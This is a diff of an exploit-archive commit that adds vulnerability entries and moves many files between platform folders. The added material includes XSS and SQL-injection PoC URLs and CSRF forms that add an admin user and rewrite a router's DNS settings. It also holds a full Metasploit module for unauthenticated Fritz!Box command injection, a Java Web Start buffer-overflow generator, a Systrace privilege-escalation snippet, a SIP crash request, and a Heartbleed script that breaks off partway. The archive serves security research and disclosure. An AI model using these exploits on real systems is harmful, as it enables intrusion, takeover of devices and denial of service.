platforms/asp/webapps/32748.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33411/info
BBSXP is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
BBSXP 5.13 and prior are vulnerable.
http://www.example.com/bbs/error.asp?message=xss

7
platforms/asp/webapps/32750.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/33416/info
OBLOG is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/oblog/err.asp?message=xss

7
platforms/asp/webapps/32756.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/33431/info
LDF is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[ldf path]/login.asp?user=[SQL COMMAND]

7
platforms/asp/webapps/32758.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/33439/info
Lootan is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[path]/login.asp?username=[SQL COMMAND]

9
platforms/cgi/webapps/32746.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33365/info
MoinMoin is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Versions prior to MoinMoin 1.8.1 are vulnerable.
http://www.example.com/moinmoin/WikiSandBox?rename="><script>alert('rename xss')</script>&action=AttachFile&drawing="><script>alert('drawing xss')</script>

119
platforms/hardware/remote/32743.txt Executable file
View file

@ -0,0 +1,119 @@
ADVISORY INFORMATION
Advisory Name: Multiple Security Vulnerabilities in Halon Security Router
Date published: 2014-04-07
Vendors contacted: Halon Security (http://www.halon.se)
Researcher: Juan Manuel Garcia (http://www.linkedin.com/in/juanmagarcia)
VULNERABILITIES INFORMATION
Vulnerabilities:
1. Reflected Cross-Site Scripting (XSS) {OWASP Top 10 2013-A3}
2. Cross-site Request Forgery (CSRF) {OWASP Top 10 2013-A8}
3. Open Redirect {OWASP Top 10 2013-A10}
Severities:
1. Reflected XSS: Medium - CVSS v2 Base Score: 5.5 (AV:N/AC:L/Au:S/C:P/I:P/A:N)
2. CSRF: High - CVSS v2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
3. Open Redirect: High - CVSS v2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Affected Applications: Security router (SR) v3.2-winter-r1 and earlier.
Affected Platforms: Software, virtual and hardware
Local / Remote: Remote
Vendor Status: Patched
VULNERABILITIES DESCRIPTION
1. Reflected XSS: https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
2. CSRF: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
3. Open Redirect: https://www.owasp.org/index.php/Open_redirect
TECHNICAL DESCRIPTION AND PROOF OF CONCEPTS
1- Reflected XSS:
At least the following parameters are not properly sanitized:
http://sr.demo.halon.se/commands/logviewer/?log=vic0';</script><script>alert(1)</script>
Parameter: log
http://sr.demo.halon.se/fileviewer/?file=";</script><script>alert(1)</script>
Parameter: file
http://sr.demo.halon.se/system/graphs/?graph='+alert(1)+'
Parameter: graph
http://sr.demo.halon.se/commands/?command='+alert(1)+'
Parameter: command
http://sr.demo.halon.se/system/users/?id='+alert(1)+'
Parameter: id
http://sr.demo.halon.se/config/?uri='+alert(1)+'
Parameter: uri
Other parameters of the application might also be affected.
2- CSRF:
At least the following functions are vulnerable:
Add user: http://xxx.xxx.xxx.xxx/system/users/?add=user
<html>
<body>
<form method="POST" name="form0" action="http://localhost:80/system/users/?add=user">
<input type="hidden" name="checkout" value="17"/>
<input type="hidden" name="apply" value=""/>
<input type="hidden" name="id" value=""/>
<input type="hidden" name="old_user" value=""/>
<input type="hidden" name="user" value="hacker"/>
<input type="hidden" name="full-name" value="ITFORCE H4x0r"/>
<input type="hidden" name="class" value=""/>
<input type="hidden" name="password" value="1234"/>
<input type="hidden" name="password2" value="1234"/>
</form>
</body>
</html>
DNS configuration: http://xxx.xxx.xxx.xxx/network/dns
<html>
<body>
<form method="POST" name="form0" action="http://localhost:80/network/dns/">
<input type="hidden" name="checkout" value="17"/>
<input type="hidden" name="apply" value=""/>
<input type="hidden" name="name-servers" value="8.8.8.8"/>
<input type="hidden" name="search-domain" value=""/>
<input type="hidden" name="host-name" value="sr.demo.halon.se"/>
</form>
</body>
</html>
Network Configuration: http://xxx.xxx.xxx.xxx/network/basic
Load Balancer Configuration: http://xxx.xxx.xxx.xxx/network/loadbalancer
VPN Configuration: http://xxx.xxx.xxx.xxx/network/vpn
Firewall Configuration: http://xxx.xxx.xxx.xxx/network/firewall
Other functions of the application might also be affected.
3- Open Redirect:
At least the following parameters are not properly sanitized:
http://sr.demo.halon.se/cluster/?switch_to=&uri=http://itforce.tk
Parameter: uri
http://sr.demo.halon.se/config/?checkout=17&uri=http://itforce.tk
Parameter: uri
Other parameters of the application might also be affected.
SOLUTION
Install / Upgrade to Security router (SR) v3.2r2
REPORT TIMELINE
2014-04-03: IT Force notifies the Halon team of the vulnerabilities and receives the support ticket ID ZOJ-105816.
2014-04-04: Vendor acknowledges the receipt of the information and informs that the vulnerabilities are going to be resolved in v3.2r2 and updates the SR online demo site.
2014-04-04: IT Force advises Halon on how to resolve the vulnerabilities reported.
2014-04-04: IT Force coordinate with Halon the advisory publication for April 07,2014.
2014-04-07: IT Force published the advisory.
CONTACT INFORMATION
www.itforce.tk

102
platforms/hardware/remote/32753.rb Executable file
View file

@ -0,0 +1,102 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
def initialize(info = {})
super(update_info(info,
'Name' => 'Fritz!Box Webcm Unauthenticated Command Injection',
'Description' => %q{
Different Fritz!Box devices are vulnerable to an unauthenticated OS command injection.
This module was tested on a Fritz!Box 7270 from the LAN side. The vendor reported the
following devices vulnerable: 7570, 7490, 7390, 7360, 7340, 7330, 7272, 7270,
7170 Annex A A/CH, 7170 Annex B English, 7170 Annex A English, 7140, 7113, 6840 LTE,
6810 LTE, 6360 Cable, 6320 Cable, 5124, 5113, 3390, 3370, 3272, 3270
},
'Author' =>
[
'unknown', # Vulnerability discovery
'Fabian Braeunlein <fabian@breaking.systems>', #Metasploit PoC with wget method
'Michael Messner <devnull@s3cur1ty.de>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '103289' ],
[ 'BID', '65520' ],
[ 'URL', 'http://www.kapple.de/?p=75' ], #vulnerability details with PoC
[ 'URL', 'https://www.speckmarschall.de/hoere.htm' ], #probably the first published details (now censored)
[ 'URL', 'http://pastebin.com/GnMKGmZ2' ], #published details uncensored from speckmarschall
[ 'URL', 'http://www.avm.de/en/Sicherheit/update_list.html' ], #vendor site with a list of vulnerable devices
[ 'URL', 'http://breaking.systems/blog/2014/04/avm-fritzbox-root-rce-from-patch-to-metasploit-module-ii' ] #wirteup with PoC
],
'DisclosureDate' => 'Feb 11 2014',
'Privileged' => true,
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE,
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
[ 'Automatic Targeting', { } ],
],
'DefaultTarget' => 0
))
end
def check
begin
res = send_request_cgi({
'uri' => '/cgi-bin/webcm',
'method' => 'GET'
})
if res && [200, 301, 302].include?(res.code)
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end
def execute_command(cmd, opts)
begin
res = send_request_cgi({
'uri' => '/cgi-bin/webcm',
'method' => 'GET',
'vars_get' => {
"var:lang" => "&#{cmd}",
}
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
def exploit
print_status("#{peer} - Trying to access the vulnerable URL...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
end
print_status("#{peer} - Exploiting...")
execute_cmdstager(
:linemax => 90
)
end
end

0
platforms/hardware/dos/11117.py → platforms/ios/dos/11117.py
View file

0
platforms/hardware/dos/11273.py → platforms/ios/dos/11273.py
View file

0
platforms/hardware/dos/11467.py → platforms/ios/dos/11467.py
View file

0
platforms/hardware/dos/11472.py → platforms/ios/dos/11472.py
View file

0
platforms/hardware/dos/11499.pl → platforms/ios/dos/11499.pl
View file

0
platforms/hardware/dos/11520.pl → platforms/ios/dos/11520.pl
View file

0
platforms/hardware/dos/11890.txt → platforms/ios/dos/11890.txt
View file

0
platforms/hardware/dos/11891.txt → platforms/ios/dos/11891.txt
View file

0
platforms/hardware/dos/13870.py → platforms/ios/dos/13870.py
View file

0
platforms/hardware/dos/13871.py → platforms/ios/dos/13871.py
View file

0
platforms/hardware/dos/15188.py → platforms/ios/dos/15188.py
View file

0
platforms/hardware/dos/18931.rb → platforms/ios/dos/18931.rb
View file

0
platforms/hardware/dos/32333.txt → platforms/ios/dos/32333.txt
View file

0
platforms/hardware/local/14538.txt → platforms/ios/local/14538.txt
View file

0
platforms/hardware/remote/15186.txt → platforms/ios/remote/15186.txt
View file

0
platforms/hardware/remote/15664.txt → platforms/ios/remote/15664.txt
View file

0
platforms/hardware/remote/16208.txt → platforms/ios/remote/16208.txt
View file

0
platforms/hardware/remote/16209.txt → platforms/ios/remote/16209.txt
View file

0
platforms/hardware/remote/16228.txt → platforms/ios/remote/16228.txt
View file

0
platforms/hardware/remote/16229.txt → platforms/ios/remote/16229.txt
View file

0
platforms/hardware/remote/16231.txt → platforms/ios/remote/16231.txt
View file

0
platforms/hardware/remote/16271.txt → platforms/ios/remote/16271.txt
View file

0
platforms/hardware/remote/16278.py → platforms/ios/remote/16278.py
View file

0
platforms/hardware/remote/16972.txt → platforms/ios/remote/16972.txt
View file

0
platforms/hardware/remote/21868.rb → platforms/ios/remote/21868.rb
View file

0
platforms/hardware/remote/21869.rb → platforms/ios/remote/21869.rb
View file

0
platforms/multiple/remote/28081.txt → platforms/ios/remote/28081.txt
View file

170
platforms/ios/remote/32738.txt Executable file
View file

@ -0,0 +1,170 @@
Document Title:
===============
Bluetooth Text Chat v1.0 iOS - Code Execution Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1250
Release Date:
=============
2014-04-07
Vulnerability Laboratory ID (VL-ID):
====================================
1250
Common Vulnerability Scoring System:
====================================
9.1
Product & Service Introduction:
===============================
BlueTooth Text Chat is a simple way to chat with near by users. Application works on BlueTooth. User can send text messages.
Pictures can be embedded in messages. It is a very simple app for quick chat. Application is compatible with `BlueMe` app series.
(Copy of the Homepage: https://itunes.apple.com/us/app/bluetooth-text-chat/id495083008 )
Abstract Advisory Information:
==============================
The vulnerability laboratory research team discovered a remote code execution web vulnerability in the official Bluetooth Text Chat v1.0 iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2014-04-07: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
HyTech Professionals
Product: Bluetooth Text Chat - iOS Mobile Web Application 1.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
A remote code execution web vulnerability has been discovered in the official Bluetooth Text Chat v1.0 iOS mobile application.
The vulnerability allows an remote attackers to execute own malicious system specific codes to compromise the iOS mobile application.
The vulnerability is located in the message body input and affects the bluetooth message listing. Remote attackers are able to inject
own system specific codes in the bluetooth message listing to compromise mobile application. The message input is not encoded or parsed
and the app functions itself only allows to send text and pictures of the local storage (phone album). The exploit can also be combined with
a loop codes to crash the app or own web script codes (htmls,php or js) to perform further attacks and persistent manipulation of modules.
The injection method requires an exchange with another connected bluetooth chat user and the attack vector is located on the application-side
of the vulnerable mobile application. The attacker includes his message with the code execution payload and the code execution occurs after
the message has been send to the local bluetooth service. The execution of the system specific code occurs in the chat messages output listing
and chat history. The code execution in the message listing does not require a link ref click or mouse-over (interaction) and executed directly
on the arrival. The security risk of the remote code execution web vulnerability is estimated as critical with a cvss (common vulnerability
scoring system) count of 9.1(+)|(-)9.2.
Exploitation of the code execution vulnerability requires a connected bluetooth user to chat and no privileged account. User interaction connect
and accept is required to interact with another user via bluetooth. Successful exploitation of the remote vulnerability results in mobile
application compromise and connected or affected device component compromise.
Request Method(s):
[+] Bluetooth (Chat > POST)
Vulnerable Module(s):
[+] Chat Message
Vulnerable Parameter(s):
[+] body > message
Affected Module(s):
[+] Messages Listing & History
Proof of Concept (PoC):
=======================
The system specific code execution vulnerability can be exploited by remote attackers via bluetooth, without required user interaction but the connection
for messaging needs to be accepted. For security demonstration or to reproduce the code execution vulnerability follow the provided information and steps
below to continue.
Requirement(s):
1. 2 x iOS devices (Tested: iPhone (A) and a iPad (B) with iOS v7.1)
2. Mobile application > https://itunes.apple.com/us/app/bluetooth-text-chat/id495083008
3. Both devices need the bluetooth module (active)
Manually steps to reproduce the vulnerability ...
1. Install the application on both ios devices ( https://itunes.apple.com/us/app/bluetooth-text-chat/id495083008 )
2. Start both applications and sync the bluetooth chat connection of device A to B
3. Accept the connection at device B of the A device request
4. Include a system specific code inside of the message body input field and press send/submit
5. The code execution occurs to everybody (A & B) who is listed as user in the same chat conversation
Note: The target user does not need to click or interact with the attacker the message only needs to arrive
6. Successful reproduce of the bluetooth text chat remote code execution vulnerability!
Picture(s):
http://www.vulnerability-lab.com/resources/pictures/1250/1.png
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable message body input.
The vulnerable output message and history listing needs to be encoded separatly to prevent script code injects, command executions or futher code exec attacks.
Security Risk:
==============
The security risk of the remote code execution web vulnerability in the Bluetooth Text Chat v1.0 is estimated as critical.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

0
platforms/hardware/webapps/24543.txt → platforms/ios/webapps/24543.txt
View file

0
platforms/hardware/webapps/24603.txt → platforms/ios/webapps/24603.txt
View file

0
platforms/hardware/webapps/25412.txt → platforms/ios/webapps/25412.txt
View file

0
platforms/hardware/webapps/25414.txt → platforms/ios/webapps/25414.txt
View file

0
platforms/hardware/webapps/25415.txt → platforms/ios/webapps/25415.txt
View file

0
platforms/hardware/webapps/25417.txt → platforms/ios/webapps/25417.txt
View file

0
platforms/hardware/webapps/26888.txt → platforms/ios/webapps/26888.txt
View file

0
platforms/hardware/webapps/26890.txt → platforms/ios/webapps/26890.txt
View file

0
platforms/hardware/webapps/26952.txt → platforms/ios/webapps/26952.txt
View file

0
platforms/hardware/webapps/26953.txt → platforms/ios/webapps/26953.txt
View file

0
platforms/hardware/webapps/26954.txt → platforms/ios/webapps/26954.txt
View file

0
platforms/hardware/webapps/27042.txt → platforms/ios/webapps/27042.txt
View file

0
platforms/hardware/webapps/27188.txt → platforms/ios/webapps/27188.txt
View file

0
platforms/hardware/webapps/27189.txt → platforms/ios/webapps/27189.txt
View file

0
platforms/hardware/webapps/27376.txt → platforms/ios/webapps/27376.txt
View file

0
platforms/hardware/webapps/27655.txt → platforms/ios/webapps/27655.txt
View file

0
platforms/hardware/webapps/27656.txt → platforms/ios/webapps/27656.txt
View file

0
platforms/hardware/webapps/28236.txt → platforms/ios/webapps/28236.txt
View file

0
platforms/hardware/webapps/28975.txt → platforms/ios/webapps/28975.txt
View file

0
platforms/hardware/webapps/28976.txt → platforms/ios/webapps/28976.txt
View file

0
platforms/hardware/webapps/28977.txt → platforms/ios/webapps/28977.txt
View file

0
platforms/hardware/webapps/28978.txt → platforms/ios/webapps/28978.txt
View file

0
platforms/hardware/webapps/29633.txt → platforms/ios/webapps/29633.txt
View file

0
platforms/hardware/webapps/30000.txt → platforms/ios/webapps/30000.txt
View file

0
platforms/hardware/webapps/30031.txt → platforms/ios/webapps/30031.txt
View file

0
platforms/hardware/webapps/30055.txt → platforms/ios/webapps/30055.txt
View file

0
platforms/hardware/webapps/30145.txt → platforms/ios/webapps/30145.txt
View file

0
platforms/hardware/webapps/30146.txt → platforms/ios/webapps/30146.txt
View file

0
platforms/hardware/webapps/30215.txt → platforms/ios/webapps/30215.txt
View file

0
platforms/hardware/webapps/30245.txt → platforms/ios/webapps/30245.txt
View file

0
platforms/hardware/webapps/30311.txt → platforms/ios/webapps/30311.txt
View file

0
platforms/windows/local/30375.txt → platforms/ios/webapps/30375.txt
View file

0
platforms/hardware/webapps/30476.txt → platforms/ios/webapps/30476.txt
View file

0
platforms/hardware/webapps/31258.txt → platforms/ios/webapps/31258.txt
View file

0
platforms/hardware/webapps/31573.txt → platforms/ios/webapps/31573.txt
View file

0
platforms/hardware/webapps/31618.txt → platforms/ios/webapps/31618.txt
View file

0
platforms/hardware/webapps/31691.txt → platforms/ios/webapps/31691.txt
View file

0
platforms/hardware/webapps/31692.txt → platforms/ios/webapps/31692.txt
View file

0
platforms/hardware/webapps/31693.txt → platforms/ios/webapps/31693.txt
View file

0
platforms/hardware/webapps/31733.txt → platforms/ios/webapps/31733.txt
View file

0
platforms/hardware/webapps/31896.txt → platforms/ios/webapps/31896.txt
View file

0
platforms/hardware/webapps/31900.txt → platforms/ios/webapps/31900.txt
View file

0
platforms/hardware/webapps/31962.txt → platforms/ios/webapps/31962.txt
View file

0
platforms/hardware/remote/32374.txt → platforms/ios/webapps/32374.txt
View file

0
platforms/hardware/webapps/32557.txt → platforms/ios/webapps/32557.txt
View file

0
platforms/hardware/webapps/32558.txt → platforms/ios/webapps/32558.txt
View file

0
platforms/hardware/webapps/32559.txt → platforms/ios/webapps/32559.txt
View file

0
platforms/hardware/webapps/32560.txt → platforms/ios/webapps/32560.txt
View file

0
platforms/hardware/webapps/32569.txt → platforms/ios/webapps/32569.txt
View file

0
platforms/hardware/webapps/32619.txt → platforms/ios/webapps/32619.txt
View file

0
platforms/hardware/webapps/32620.txt → platforms/ios/webapps/32620.txt
View file

0
platforms/hardware/webapps/32664.txt → platforms/ios/webapps/32664.txt
View file

0
platforms/hardware/webapps/32703.txt → platforms/ios/webapps/32703.txt
View file

9
platforms/jsp/webapps/32741.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33360/info
Apache Jackrabbit is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Apache Jackrabbit 1.5.2 are vulnerable.
http://www.example.com/search.jsp?q=%25%22%3Cscript%3Ealert(1)%3C/script%3E

9
platforms/jsp/webapps/32742.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33360/info
Apache Jackrabbit is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Apache Jackrabbit 1.5.2 are vulnerable.
http://www.example.com/swr.jsp?q=%25"<script>alert(1)</script>&swrnum=1

9
platforms/linux/dos/32740.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33352/info
QNX RTOS is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to cause a kernel panic, denying service to legitimate users.
QNX RTOS 6.4.0 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/32740.bin

13
platforms/linux/dos/32749.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/33414/info
Pidgin is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input.
Successful exploits will cause the affected application to crash, effectively denying service to legitimate users.
Pidgin 2.4.1 is vulnerable; other versions may also be affected.
NOTE: This issue was previously thought to be a subset of the vulnerability documented in BID 29956 (Pidgin 'msn_slplink_process_msg()' Multiple Integer Overflow Vulnerabilities), but has been given its own record to properly document the vulnerability.
Sending a filename that contains the maximum number of allowable characters and that includes the characters defined by the hex data below will crash the application.
'26 23 38 32 32 37 3b 20 26 23 38 32 32 38 3b 20 26 23 38 32 32 39 3b 20 85'

17
platforms/linux/local/32751.c Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/33417/info
Systrace is prone to a local privilege-escalation vulnerability.
A local attacker may be able to exploit this issue to bypass access control restrictions and make unintended system calls, which may result in an elevation of privileges.
Versions prior to Systrace 1.6f are vulnerable.
int
main(int argc, const char* argv[])
{
/* Syscall 1 is exit on i386 but write on x86_64. */
asm volatile("movl $1, %eax\n"
"int $0x80\n");
for (;;);
}

139
platforms/linux/remote/30284.vbs Executable file
View file

@ -0,0 +1,139 @@
source: http://www.securityfocus.com/bid/24832/info
Sun Java Runtime Environment is prone to a stack-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will likely result in a denial-of-service condition.
This issue affects these versions:
Java Runtime Environment 6 update 1
Java Runtime Environment 5 update 11
Prior versions are also affected.
'-----------------------------------------------------------------------------------------------
' Java Web Start Buffer Overflow POC Exploit
'
' FileName: JavaWebStartPOC.VBS
' Contact: ZhenHan.Liu#ph4nt0m.org
' Date: 2007-07-10
' Team: http://www.ph4nt0m.org
' Enviroment: Tested on JRE 1.6, javaws.exe v6.0.10.6
' Reference: http://seclists.org/fulldisclosure/2007/Jul/0155.html
' Usage: I did not put a real alpha shellcode here, you'd replace it with your own.
'
' Code(javaws.exe):
' .text:00406208 ; *************** S U B R O U T I N E ***************************************
' .text:00406208
' .text:00406208 ; Attributes: bp-based frame
' .text:00406208
' .text:00406208 sub_406208 proc near ; CODE XREF: sub_405468+4E p
' .text:00406208
' .text:00406208 FileName = byte ptr -540h
' .text:00406208 FindFileData = _WIN32_FIND_DATAA ptr -140h
' .text:00406208 arg_0 = dword ptr 8
' .text:00406208 arg_4 = dword ptr 0Ch
' .text:00406208
' .text:00406208 push ebp ; FileName 1k Buffer
' .text:00406209 mov ebp, esp
' .text:0040620B sub esp, 540h
' .text:00406211 push 5Fh
' .text:00406213 push 2Fh
' .text:00406215 push [ebp+arg_0]
' .text:00406218 call sub_40544D
' .text:00406218
' .text:0040621D push 5Fh
' .text:0040621F push 3Ah
' .text:00406221 push [ebp+arg_0]
' .text:00406224 call sub_40544D
' .text:00406224
' .text:00406229 add esp, 18h
' .text:0040622C push 2Ah
' .text:0040622E push [ebp+arg_0] ; codebase buffer
' .text:00406231 push 5Ch
' .text:00406233 push offset s_Si ; "si"
' .text:00406238 push 5Ch
' .text:0040623A push offset s_Tmp_0 ; "tmp"
' .text:0040623F push 5Ch
' .text:00406241 call sub_40615B
' .text:00406241
' .text:00406246 push eax
' .text:00406247 lea eax, [ebp+FileName]
' .text:0040624D push offset s_SCSCSCSC ; "%s%c%s%c%s%c%s%c"
' .text:00406252 push eax ; char *
' .text:00406253 call _sprintf ; sprintf copy codebase to 1k stack buffer lead to buffer over flow
' .text:00406253
' .text:00406258 add esp, 28h
' .text:0040625B lea eax, [ebp+FindFileData]
' .text:00406261 push eax ; lpFindFileData
' .text:00406262 lea eax, [ebp+FileName]
' .text:00406268 push eax ; lpFileName
' .text:00406269 call ds:FindFirstFileA
' .text:0040626F cmp eax, 0FFFFFFFFh
' .text:00406272 jnz short loc_406278
' .text:00406272
' .text:00406274 xor eax, eax
' .text:00406276 leave
' .text:00406277 retn
' .text:00406277
' .text:00406278 ; ---------------------------------------------------------------------------
' .text:00406278
' .text:00406278 loc_406278: ; CODE XREF: sub_406208+6A j
' .text:00406278 push esi
' .text:00406279 mov esi, [ebp+arg_4]
' .text:0040627C lea ecx, [ebp+FindFileData' .cFileName]
' .text:00406282 mov edx, ecx
' .text:00406284 sub esi, edx
' .text:00406284
' .text:00406286
' .text:00406286 loc_406286: ; CODE XREF: sub_406208+86 j
' .text:00406286 mov dl, [ecx]
' .text:00406288 mov [esi+ecx], dl
' .text:0040628B inc ecx
' .text:0040628C test dl, dl
' .text:0040628E jnz short loc_406286
' .text:0040628E
' .text:00406290 push eax ; hFindFile
' .text:00406291 call ds:FindClose
' .text:00406297 xor eax, eax
' .text:00406299 inc eax
' .text:0040629A pop esi
' .text:0040629B leave
' .text:0040629C retn
' .text:0040629C
' .text:0040629C sub_406208 endp
'-----------------------------------------------------------------------------------------------
If WScript.Arguments.Count <> 1 Then
WScript.Echo WScript.ScriptName & " <FileName>"
WScript.Quit
End If
sFileName = WScript.Arguments(0)
On Error Resume Next
Set oFSO = WScript.CreateObject("Scripting.FileSystemObject")
Set oFS = oFSO.CreateTextFile(sFileName)
If Err.Number <> 0 Then
WScript.Echo "Error: Failed Create File."
WScript.Quit
End If
c = Chr(&H04)
alphaShellcode = "IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII"
oFS.WriteLine "<?xml version=""1.0"" encoding=""utf-8""?>"
oFS.WriteLine "<jnlp spec=""1.0+"" codebase=""http://" & String(12000000, c) & alphaShellcode & String(24, c) & """ href=""test.jnlp"">"
oFS.WriteLine "</jnlp>"
If Err.Number <> 0 Then
WScript.Echo "Error: Failed Write File."
Err.Clear
End If
oFS.Close
Set oFS = Nothing
Set oFSO = Nothing

14
platforms/multiple/dos/30974.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/27110/info
Asterisk is prone to a remote denial-of-service vulnerability.
Exploiting this issue allows remote attackers to cause the application to crash, effectively denying service to legitimate users.
BYE sip:303@10.0.0.15 SIP/2.0
Via: SIP/2.0/UDP 10.0.0.100:7279;branch=z9hG4bK976ed70381c64bc6a5ec25b63f3df402
To: <sip:303@10.0.0.15>;tag=as664746ba
From: <sip:user@10.0.0.15>;tag=0509943750
Call-ID: 11f5ae5ba1e04a25a1184ff158654371
CSeq: 3 BYE
Max-Forwards: 70
Also: sip:303@10.0.0.15

10
platforms/multiple/remote/31912.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/29718/info
GSC Client is prone to a privilege-escalation vulnerability because it fails to sufficiently validate administrator credentials.
An attacker can exploit this vulnerability to perform unauthorized administrative actions; other attacks are also possible.
GSC Client 1.00 2067 is vulnerable; other versions may also be affected.
NOTICE <user> :KICK <channel id> :<kick message>

136
platforms/multiple/remote/32745.py Executable file
View file

@ -0,0 +1,136 @@
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
